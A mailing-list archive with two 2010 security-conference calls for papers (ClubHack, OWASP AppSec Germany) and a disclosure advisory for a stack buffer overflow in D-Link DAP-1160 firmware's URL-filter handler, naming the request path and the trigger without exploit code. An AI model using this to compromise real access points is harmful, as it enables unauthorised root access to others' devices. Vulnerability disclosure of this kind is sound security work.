:: Call For Paper :: Mother of all Indian Hacker's Conferences ClubHack is now in its fourth year and we again invite all the geeks hackers around the world to be a part of the same. ClubHack2010 opens its CFP today. See http://clubhack.com/2010/cfp We are expecting a good deep knowledge technical presentations/demonstrations on topics from the world of Information Security. These presentations are expected to be of 40 minutes each. The schedule time for each presenter would be 50 minutes out of which 40 minutes are for the presentation 10 for the question-answer sessions. We’d request you to submit the papers keeping the time constraint in mind. :: Event :: Date: 3rd, 4th 5th December (As Usual the first weekend of December) Place: Pune, India We are also hosting the finals of Malcon at ClubHack2010, for more information CFP of malcon see http://malcon.org/ 3rd December - Malcon workshop 4th December - Keynote by Bruce Schneier Other talks 5th December - Malcon awards and Other talks (Event plan may change in future) :: Scope :: (includes, but not limited to) # Protocol / Application based vulnerability in networks and computers # Firewall Evasion techniques # Cloud Application Security # Data Recovery and Incident Response # Mobile Security (cellular technologies) # WLAN and Bluetooth Security # Analysis of malicious code # Cryptography and Cryptanalysis # Computer forensics # Cyber warfare # Open source hacking toolkit # Cyber Crime law # Hardware mods :: Exclusion :: Sales Pitch :: Deadlines :: Opening: 15th July 2010 Abstract Submission: 30th October 2010 Announcement of selected papers: 5th November 2010 Full Paper Submission: 15th November 2010 :: Speakers' Privileges :: Economic Return Ticket - from your nearest international airport to Pune Accommodation (upto 4 days) Local Tourism package (in Sahyadri Ranges, Western Ghat) One extra ticket for the event No other expenses as we are a not-for-profit group finding sponsors in India is tough :) :: Sponsors :: That reminds, if you are interested in supporting the event in any possible way, please write to us spon...@clubhack.com :: Other details :: All other details are available at Event website: http://clubhack.com/2010 :: Submission :: Check submission details at http://clubhack.com/2010/cfp send it to c...@clubhack.com Thanks team ClubHack -- This is a non-monitored alias, please do not reply directly. Please send your mails to i...@clubhack.com
OWASP Appsec Germany Call for Papers
Hi, the German section of the Open Web Application Security Project (OWASP) announces a for Presentations (CfP) for the third OWASP AppSec Germany conference on the 20th of October 2010 in Nuremberg. The conference will be held in parallel with the IT security exhibition. The conference is primarily oriented toward a german speaking audience, but also presentations in English are welcome. The OWASP AppSec Germany 2010 will extend the range of typical security conferences with contributions covering development, operation and test of web-based applications. Please find the complete CFP including all details here (closes 01 August 2010): http://www.owasp.org/index.php/OWASP_AppSec_Germany_2010_Conference#tab=Call_for_Papers_-_English_Version Cheers Tobias Glemser Board Member German Chapter OWASP
IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow
Security Advisory IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow Advisory Information Published: 2010-07-14 Updated: 2010-07-14 Manufacturer: D-Link Model: DAP-1160 Firmware version: 1.20b06 1.30b10 1.31b01 Vulnerability Details - Public References: Not Assigned Platform: Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01. Other models and/or firmware versions may be also affected. Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31 Background Information: D-Link DAP-1160 is a wireless access points that allow wireless clients connectivity to wired networks. Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported. Summary: A buffer overflow condition can be triggered by setting URL filtering for an overly long URL, leading to possible arbitrary code execution or denial of service. Successful authentication is required in order to exploit the vulnerability, but attackers can leverage other vulnerabilities for achieving unauthenticated remote exploitation. Details: Changing the device configuration involves sending a properly formatted POST request to the following URL: http://IP_ADDR/apply.cgi?formhandler_func where IP_ADDR is the device IP address and the formhandler_func is a function, specific to the task to be accomplished, that will handle the POST parameters present in the request body. The formFilter() function can be used for applying specific filters to the communication going through the Access Point, and is not accessible through any of the links available on the device administration interface. Nonetheless, the web page available at the following URL http://IP_ADDR/adv_webfilter.htm relies on such function for applying URL filters. One of the functionalities formFilter function allows for is URL filtering performed on a specific URL, submitted via the above mentioned web page or by sending a properly formatted POST request. The provided URL is copied on the stack in a fixed sizer buffer, allowing for buffer overflow and possible arbitrary code execution with root privileges, if an overly long URL is provided. A successful authentication is required in order to be able to to trigger the vulnerability, but an attacker may leverage DCC protocol and authentication bypass vulnerability for achieving unauthenticated remote exploitation. Impacts: Arbitrary code execution Denial of service Solutions Workaround: Not available Additional Information -- Timeline (dd/mm/yy): 17/02/2010: Vulnerability discovered 17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website 18/02/2010: Point of contact requested to customer service --- No response --- 26/05/2010: Vulnerability disclosed at CONFidence 2010 14/07/2010: This advisory Additional information available at http://www.icysilence.org
